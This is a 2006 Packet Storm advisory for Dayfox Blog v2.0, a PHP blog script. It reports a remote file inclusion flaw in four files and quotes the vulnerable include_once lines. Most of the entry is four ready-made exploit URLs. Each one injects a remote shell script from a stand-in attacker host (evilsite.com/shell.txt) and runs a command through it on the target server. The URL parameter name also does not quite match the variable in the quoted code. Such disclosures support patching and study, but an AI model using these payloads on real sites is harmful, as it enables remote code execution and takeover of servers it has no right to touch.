DayfoxBlogv2.0.txt

2006-10-04T00:00:00
ID PACKETSTORM:50609
Type packetstorm
Reporter Dj ReMix
Modified 2006-10-04T00:00:00

Description

                                        
                                            `# BiyoSecurity.Org  
  
# script name : Dayfox Blog v2.0  
  
# Risk : High  
  
# Regards : Dj ReMix  
  
# Thanks : Korsan , Liz0zim  
  
# Vulnerable files :   
  
adminlog.php  
postblog.php  
index.php  
index2.php  
  
# Vulnerable code :  
  
include_once ($slogin_path . "/slogin_lib.inc.php");  
include_once ($slogin_path . "/header.inc.php");  
  
  
Exploit : http://site.com/[path to script]/edit/adminlog.php?slogin=http://evilsite.com/shell.txt?&cmd=id  
  
http://site.com/[path to script]/edit/index.php?slogin=http://evilsite.com/shell.txt?&cmd=id  
  
http://site.com/[path to script]/edit/index2.php?slogin=http://evilsite.com/shell.txt?&cmd=id  
  
http://site.com/[path to script]/edit/postblog.php?slogin=http://evilsite.com/shell.txt?&cmd=id  
  
`